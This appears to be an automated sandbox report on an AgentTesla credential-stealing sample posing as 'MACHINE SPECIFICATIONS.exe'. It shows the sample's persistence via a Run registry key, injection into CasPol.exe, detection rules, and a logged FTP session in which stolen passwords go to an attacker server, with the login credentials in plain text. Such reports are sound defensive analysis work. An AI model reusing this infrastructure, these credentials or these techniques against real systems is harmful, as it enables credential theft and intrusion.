                      • Found application associated with file extension: .exe
                      • Override analysis time to 240s for sample files taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 67.27.158.254, 8.248.135.254, 8.241.123.126, 8.248.143.254, 67.27.157.254
                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
                      • Execution Graph export aborted for target newapp.exe, PID 4272 because it is empty
                      • Execution Graph export aborted for target newapp.exe, PID 676 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      11:19:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      11:20:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      11:20:12API Interceptor1137x Sleep call for process: CasPol.exe modified
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):654
                      Entropy (8bit):5.374391981354885
                      Encrypted:false
                      SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                      MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                      SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                      SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                      SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                      Malicious:true
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                      Process:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):42
                      Entropy (8bit):4.0050635535766075
                      Encrypted:false
                      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                      MD5:84CFDB4B995B1DBF543B26B86C863ADC
                      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):107624
                      Entropy (8bit):5.882571203162287
                      Encrypted:false
                      SSDEEP:1536:oSF7vA1hRqHixxMjlI34j8p2mdc/6A4vW/CU1RPMRVQJE:/A1hDPMip2mdcyA4vW/JRPMLQW
                      MD5:F866FC1C2E928779C7119353C3091F0C
                      SHA1:70D06064E2F12CFB10A82BC985F86F58EA7A4138
                      SHA-256:67F3FC243C58EEAE55BDDC22CE025B7841A89ACA2E201B999D8C0E4F07D177B8
                      SHA-512:B28B10801580726B85AB5F796EA26835648A3ACFBE1FBA95DFC687439B43FF9548BD3AB9EFC85D88FC071D232718BCFFAC614CC5BFF159173996A3D2AB22154D
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...rX.Z..............0..X...........v... ........@.. ..............................Q.....`.................................<v..O.......$............f..h>...........u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B................pv......H.......,...`...............xE...t......................................2~P....o....*.r...p(....*VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F
                      Process:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):486
                      Entropy (8bit):5.064987733454706
                      Encrypted:false
                      SSDEEP:12:z30U30b4BFNY8fNFquci7S1pE+DPOCN6+QOH5JyY:z3F3g4DO4UE+Tz5JB
                      MD5:30394F72BB157162F35A2DEB1F48BD1A
                      SHA1:66AD7D748F42C64E0698606A8F019D165DE657E8
                      SHA-256:133FABF0CD558FA3E5144E9EF35654FA0422F8424C6D5D82828B8D10EC9BA295
                      SHA-512:A93E12D6C9927403FE0E20B8A698B24007EBCCD53A29AD65428366C6CE3CED05E5F3AEFF1D46C7D9F174EAEAE5059F0B5D12353B6022965CDC5D187E45FA72E9
                      Malicious:false
                      Preview:Microsoft .NET Framework CasPol 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....WARNING: The .NET Framework does not apply CAS policy by default. Any settings shown or modified by CasPol will only ..affect applications that opt into using CAS policy. ....Please see http://go.microsoft.com/fwlink/?LinkId=131738 for more information. ......ERROR: Not enough arguments....For usage information, use 'caspol -?'..
                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.979738488629949
                      TrID:
                      • Win64 Executable GUI (202006/5) 92.65%
                      • Win64 Executable (generic) (12005/4) 5.51%
                      • Generic Win/DOS Executable (2004/3) 0.92%
                      • DOS Executable Generic (2002/1) 0.92%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:MACHINE SPECIFICATIONS.exe
                      File size:523776
                      MD5:92945d0a2731ef771ea9d10c792e03e1
                      SHA1:1eeef600b7b51ce7aa93e825be55b40f3ef8e319
                      SHA256:46b61250c34b38d26ac5897217e6b70a222ff16318161c4e67c74c74491cc612
                      SHA512:33ff6835de8b3a4a0002669deb68acf14a770e7546c2250eb6cdcde2ad4841891f504faa77427e864d1b7758481864189039beb8ec9d926f5804bd7da30a5fb2
                      SSDEEP:12288:BxNQOgJk4hl4vPE1suvqvku873X9BsILNILZoRPzre:BxNi6MlzX9BsILNILZoFre
                      TLSH:F7B4235560BB2097E21682344A275FA211E4AE2325E6BD4FE3DCBD0F5F732402E39766
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...$..c.........."...0......B........... ....@...... .......................@............`................................
                      Icon Hash:c49a0894909c6494
                      Entrypoint:0x400000
                      Entrypoint Section:
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x63800824 [Fri Nov 25 00:11:16 2022 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:
                      Instruction
                      dec ebp
                      pop edx
                      nop
                      add byte ptr [ebx], al
                      add byte ptr [eax], al
                      add byte ptr [eax+eax], al
                      add byte ptr [eax], al
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x40a0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x7d8640x1c.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x7b8d30x7ba00False0.9942492416582407data7.996815914318105IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x7e0000x40a00x4200False0.4485677083333333data5.797210494950491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x7e1900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024
                      RT_ICON0x7e5f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                      RT_ICON0x7f6a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                      RT_GROUP_ICON0x81c480x30data
                      RT_VERSION0x81c780x23cdata
                      RT_MANIFEST0x81eb40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      192.168.2.351.195.62.16049702212029927 11/29/22-11:20:12.397759TCP2029927ET TROJAN AgentTesla Exfil via FTP4970221192.168.2.351.195.62.160
                      192.168.2.351.195.62.16049703522592851779 11/29/22-11:20:12.420526TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4970352259192.168.2.351.195.62.160
                      TimestampSource PortDest PortSource IPDest IP
                      Nov 29, 2022 11:19:53.759691000 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:19:53.759767056 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:53.759933949 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:19:53.807363987 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:19:53.807424068 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:54.121747017 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:54.122018099 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:19:54.132211924 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:19:54.132246971 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:54.132662058 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:54.338932991 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:54.339055061 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:19:54.616307974 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:19:54.616383076 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:54.763174057 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:54.763329983 CET443497013.220.57.224192.168.2.3
                      Nov 29, 2022 11:19:54.763463974 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:19:54.767330885 CET49701443192.168.2.33.220.57.224
                      Nov 29, 2022 11:20:12.212491989 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.231043100 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.231232882 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.250191927 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.250646114 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.269145012 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.269206047 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.269444942 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.296277046 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.296541929 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.314970016 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.315330029 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.333745003 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.334007978 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.352402925 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.354644060 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.373279095 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.378772974 CET4970352259192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.397347927 CET522594970351.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.397562027 CET4970352259192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.397758961 CET4970221192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.416052103 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.420526028 CET4970352259192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.420638084 CET4970352259192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.438709974 CET522594970351.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.438776970 CET522594970351.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.438832998 CET214970251.195.62.160192.168.2.3
                      Nov 29, 2022 11:20:12.438872099 CET4970352259192.168.2.351.195.62.160
                      Nov 29, 2022 11:20:12.438963890 CET4970221192.168.2.351.195.62.160
                      TimestampSource PortDest PortSource IPDest IP
                      Nov 29, 2022 11:19:53.677805901 CET5799053192.168.2.38.8.8.8
                      Nov 29, 2022 11:19:53.695560932 CET53579908.8.8.8192.168.2.3
                      Nov 29, 2022 11:19:53.711530924 CET5238753192.168.2.38.8.8.8
                      Nov 29, 2022 11:19:53.730598927 CET53523878.8.8.8192.168.2.3
                      Nov 29, 2022 11:20:12.084580898 CET5692453192.168.2.38.8.8.8
                      Nov 29, 2022 11:20:12.209414005 CET53569248.8.8.8192.168.2.3
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Nov 29, 2022 11:19:53.677805901 CET192.168.2.38.8.8.80xfd66Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.711530924 CET192.168.2.38.8.8.80x6f4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                      Nov 29, 2022 11:20:12.084580898 CET192.168.2.38.8.8.80xa066Standard query (0)ftp.electrobist.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Nov 29, 2022 11:18:50.334419966 CET8.8.8.8192.168.2.30xd9b5No error (0)au.c-0001.c-msedge.netc-0001.c-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Nov 29, 2022 11:18:50.334419966 CET8.8.8.8192.168.2.30xd9b5No error (0)c-0001.c-msedge.net13.107.4.50A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                      Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.695560932 CET8.8.8.8192.168.2.30xfd66No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                      Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:19:53.730598927 CET8.8.8.8192.168.2.30x6f4No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                      Nov 29, 2022 11:20:12.209414005 CET8.8.8.8192.168.2.30xa066No error (0)ftp.electrobist.com51.195.62.160A (IP address)IN (0x0001)false
                      • api.ipify.org
                      TimestampSource PortDest PortSource IPDest IPCommands
                      Nov 29, 2022 11:20:12.250191927 CET214970251.195.62.160192.168.2.3220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                      Nov 29, 2022 11:20:12.250646114 CET4970221192.168.2.351.195.62.160USER user1@electrobist.com
                      Nov 29, 2022 11:20:12.269206047 CET214970251.195.62.160192.168.2.3331 User user1@electrobist.com OK. Password required
                      Nov 29, 2022 11:20:12.269444942 CET4970221192.168.2.351.195.62.160PASS w&oNc9e]pf~4
                      Nov 29, 2022 11:20:12.296277046 CET214970251.195.62.160192.168.2.3230 OK. Current restricted directory is /
                      Nov 29, 2022 11:20:12.314970016 CET214970251.195.62.160192.168.2.3504 Unknown command
                      Nov 29, 2022 11:20:12.315330029 CET4970221192.168.2.351.195.62.160PWD
                      Nov 29, 2022 11:20:12.333745003 CET214970251.195.62.160192.168.2.3257 "/" is your current location
                      Nov 29, 2022 11:20:12.334007978 CET4970221192.168.2.351.195.62.160TYPE I
                      Nov 29, 2022 11:20:12.352402925 CET214970251.195.62.160192.168.2.3200 TYPE is now 8-bit binary
                      Nov 29, 2022 11:20:12.354644060 CET4970221192.168.2.351.195.62.160PASV
                      Nov 29, 2022 11:20:12.373279095 CET214970251.195.62.160192.168.2.3227 Entering Passive Mode (51,195,62,160,204,35)
                      Nov 29, 2022 11:20:12.397758961 CET4970221192.168.2.351.195.62.160STOR PW_user-965543_2022_11_29_11_20_10.html
                      Nov 29, 2022 11:20:12.416052103 CET214970251.195.62.160192.168.2.3150 Accepted data connection
                      Nov 29, 2022 11:20:12.438832998 CET214970251.195.62.160192.168.2.3226-File successfully transferred
                      226-File successfully transferred226 0.023 seconds (measured here), 19.62 Kbytes per second

                      Click to jump to process

                      Target ID:0
                      Start time:11:18:56
                      Start date:29/11/2022
                      Path:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                      Imagebase:0x19218000000
                      File size:523776 bytes
                      MD5 hash:92945D0A2731EF771EA9D10C792E03E1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:low

                      Target ID:10
                      Start time:11:19:46
                      Start date:29/11/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      Imagebase:0x10000
                      File size:107624 bytes
                      MD5 hash:F866FC1C2E928779C7119353C3091F0C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:11
                      Start time:11:20:05
                      Start date:29/11/2022
                      Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Imagebase:0x800000
                      File size:107624 bytes
                      MD5 hash:F866FC1C2E928779C7119353C3091F0C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Antivirus matches:
                      • Detection: 0%, ReversingLabs
                      Reputation:moderate

                      Target ID:12
                      Start time:11:20:05
                      Start date:29/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff745070000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:13
                      Start time:11:20:13
                      Start date:29/11/2022
                      Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Imagebase:0x490000
                      File size:107624 bytes
                      MD5 hash:F866FC1C2E928779C7119353C3091F0C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      Target ID:14
                      Start time:11:20:14
                      Start date:29/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff745070000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      No disassembly